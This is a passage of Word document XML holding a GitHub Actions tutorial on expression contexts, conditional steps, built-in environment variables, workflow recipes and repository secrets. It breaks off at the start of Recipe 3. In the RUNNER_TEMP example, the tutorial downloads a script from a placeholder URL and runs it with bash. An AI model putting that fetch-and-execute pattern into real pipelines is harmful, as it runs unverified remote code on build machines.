      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are the ones you'll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Context</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What's in it</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Example</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Event info, repo, actor, SHA, ref.</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 github.actor }}</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env</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Env variables you set.</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 env.NODE_VERSION }}</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secrets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Secrets from settings.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 secrets.API_KEY }}</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vars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Non-secret config variables.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 vars.DEPLOY_REGION }}</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steps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Outputs from earlier steps in this job.</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 steps.build.outputs.tag }}</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jobs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Outputs from earlier jobs in this workflow.</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 needs.build.outputs.version }}</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runner</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The runner's OS, arch, temp dirs.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 runner.os }}</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inputs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workflow_dispatch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">workflow_call</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> inputs.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 inputs.environment }}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Using expressions in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">if:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This is where expressions earn their keep. Conditional execution:</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Deploy only from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github.ref == 'refs/heads/main'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./deploy.sh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Run on failure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failure()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echo "something went wrong"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Skip dependabot PRs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github.actor != 'dependabot[bot]'</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npm test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful status functions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">success()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">failure()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">cancelled()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">always()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10.3 The built-in environment variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub gives every step a handful of env vars automatically — no setup required. In a shell, use them as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">$VAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Linux / Mac and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">$env:VAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Windows PowerShell. They're also accessible inside expressions as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">${{ github.* }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">${{ runner.* }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's the reference table, then a small example for each variable so you can see when you'd actually reach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Variable</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What it is</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Typical use</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GITHUB_SHA</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The 40-char commit SHA for this run.</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Tagging Docker images, generating unique build IDs.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GITHUB_REF</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Full ref — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">refs/heads/&lt;branch&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">refs/tags/&lt;tag&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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Conditional logic.</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GITHUB_REF_NAME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Short ref — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">v1.2.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">feature/x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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Human-readable tags, image labels.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GITHUB_ACTOR</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The username that triggered the run.</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Audit logs, deny-listing bots.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GITHUB_REPOSITORY</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owner/repo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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API calls, image names.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GITHUB_WORKSPACE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Absolute path to the checked-out repo on the runner.</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Building absolute script paths.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GITHUB_RUN_ID</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Unique numeric ID for this run.</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Linking back to logs from external systems.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GITHUB_EVENT_NAME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The triggering event — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">push</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">pull_request</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">schedule</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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Branching logic in workflows that handle multiple events.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RUNNER_OS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Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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OS-specific shell paths.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RUNNER_ARCH</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X64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">ARM64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, etc.</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Downloading the right binary.</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RUNNER_TEMP</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Scratch directory, cleaned after the job.</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Temp files, downloaded installers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A small worked example for each:</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GITHUB_SHA — tag an image with the exact commit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docker build -t myapp:$GITHUB_SHA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GITHUB_REF — only run a step when on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github.ref == 'refs/heads/main'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./deploy-prod.sh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GITHUB_REF_NAME — readable image tag (main, v1.2.0)</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docker tag myapp:$GITHUB_SHA myapp:$GITHUB_REF_NAME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GITHUB_ACTOR — who's running this?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echo "Run started by $GITHUB_ACTOR"</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GITHUB_REPOSITORY — building a registry image name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docker push ghcr.io/$GITHUB_REPOSITORY:latest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GITHUB_RUN_ID — link back to the run from Slack</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URL="$GITHUB_SERVER_URL/$GITHUB_REPOSITORY/actions/runs/$GITHUB_RUN_ID"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"Failed run: $URL"</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RUNNER_OS — branch on OS in a cross-platform job</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 "$RUNNER_OS" = "Linux" ]; then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./scripts/install-linux.sh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else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./scripts/install-mac.sh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fi</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RUNNER_TEMP — scratch directory that's cleaned up automatically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curl -o $RUNNER_TEMP/installer https://example.com/install.sh</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bash $RUNNER_TEMP/installer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">And one putting several together:</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Build and tag image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docker build -t myapp:$GITHUB_SHA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docker tag myapp:$GITHUB_SHA myapp:$GITHUB_REF_NAME</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"Built by $GITHUB_ACTOR on $RUNNER_OS, run $GITHUB_RUN_ID"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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11. Recipes you'll probably copy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">These are the automations most teams end up with. Copy, tweak, commit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recipe 1 — Tests on every PR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Nothing fancy, just the bread and butter.</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Tests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pull_request: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actions/setup-node@v4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 '20'</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cache: 'npm'</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ci</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test</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Recipe 2 — Deploy when a tag is pushed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Pair this with a manual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">git tag v1.0.0 &amp;&amp; git push origin v1.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you have a release button.</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tags: ['v*']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environment: production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DEPLOY_KEY: ${{ secrets.DEPLOY_KEY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./deploy.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A note on `secrets.DEPLOY_KEY`.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> That name is just a placeholder — the value comes from a GitHub Secret you create yourself. Open the repo's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Settings → Secrets and variables → Actions → New repository secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, name it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">DEPLOY_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, and paste in whatever your deploy script needs to authenticate: an SSH private key, an API token, a hosting-provider credential. The workflow reads it as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">${{ secrets.DEPLOY_KEY }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and exposes it to the script as the env var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">$DEPLOY_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can call it whatever you want — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PROD_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">RAILWAY_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH_DEPLOY_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — as long as the secret name in Settings and the reference in the workflow match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recipe 3 — A nightly cleanup job</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
